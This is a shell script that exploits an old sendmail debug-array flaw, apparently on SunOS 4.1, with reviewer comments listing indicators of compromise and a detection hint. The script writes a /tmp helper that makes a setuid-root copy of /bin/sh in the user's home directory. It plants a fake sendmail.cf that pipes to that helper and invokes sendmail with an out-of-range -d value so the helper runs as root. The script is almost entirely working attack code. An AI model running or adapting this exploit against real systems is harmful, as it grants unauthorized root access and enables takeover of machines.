#!/bin/sh
#
# Description: Exploits sendmail vulnerability which allows the changing of
#              arbitrary elements in the debug array.  In this case we
#              change the path of the sendmail configuration file,
#              /etc/sendmail.cf, to eetc/sendmail.cf which allows us to
#              specify our own configuration file.
#
# Newest sendmail bug (SunOS 4.1/sendmail 4.1) - nextpert
#

# NOTE(review): triage summary of the artifacts this listing creates, for use
# on a host where it may have been run:
#   - /tmp/exploit       helper script at a fixed path in /tmp, mode 755
#   - eetc/sendmail.cf   one-line config in a directory named eetc, created
#                        relative to the working directory
#   - $HOME/root.sh      copy of /bin/sh that the helper marks mode 4755 and
#                        chowns to root.staff
# A setuid-root file under a user home directory, or a directory named eetc
# holding a sendmail.cf, is worth treating as an indicator of compromise.
# The header names SunOS 4.1 / sendmail 4.1 as the affected release.
# Presumably the fix is a sendmail build that range-checks the debug
# category parsed from -d; confirm against the vendor advisory.

# Create the helper script that the substitute sendmail.cf names,
# /tmp/exploit. The here-document delimiter is unquoted, so $HOME is expanded
# by the shell running this listing and the resulting path is written into
# the helper literally.
echo Creating /tmp/exploit, which sendmail will run as root
cat > /tmp/exploit << _EOF_
#!/bin/sh
cp /bin/sh $HOME/root.sh
chown root.staff $HOME/root.sh
chmod 4755 $HOME/root.sh
_EOF_

# Make /tmp/exploit executable (mode 755: readable and executable by all).
echo Changing mode of /tmp/exploit to 755
chmod 755 /tmp/exploit

# Write the substitute configuration file into ./eetc. Its only line is an F
# (class definition) entry whose leading | names a program instead of a file;
# per the comment on the helper above, sendmail runs that program when it
# reads this file. mkdir is called without -p and its exit status is not
# checked, so an existing eetc directory produces an error message only.
echo Making fake configuration file
mkdir eetc
cat > eetc/sendmail.cf << _EOF_
FV|/tmp/exploit
_EOF_

# Intended to invoke /usr/lib/sendmail with a -d (debug) argument of the form
# category.level. Per the header, the category is not confined to the debug
# array, so the level value is presumably written over part of the
# configuration path; 101 is the ASCII code for the letter e, which matches
# the /etc to eetc change the header describes.
# NOTE(review): the category value is presumably specific to the named
# SunOS 4.1 binary - confirm before treating the exact number as a signature.
# For detection, a sendmail invocation by a non-root user carrying -d with a
# category far outside the normal range is the event to alert on.
echo Running sendmail, wait a few seconds, then hit Control-C, if it
echo doesn't exit.
sleep 1
/usr/lib/sendmail -uroot -d4294949608.101 nobody

# if all goes well you will have a setuid root shell sitting in your home
# directory, ~/root.sh, don't forget to clean up /tmp/exploit and
# eetc/sendmail.cf
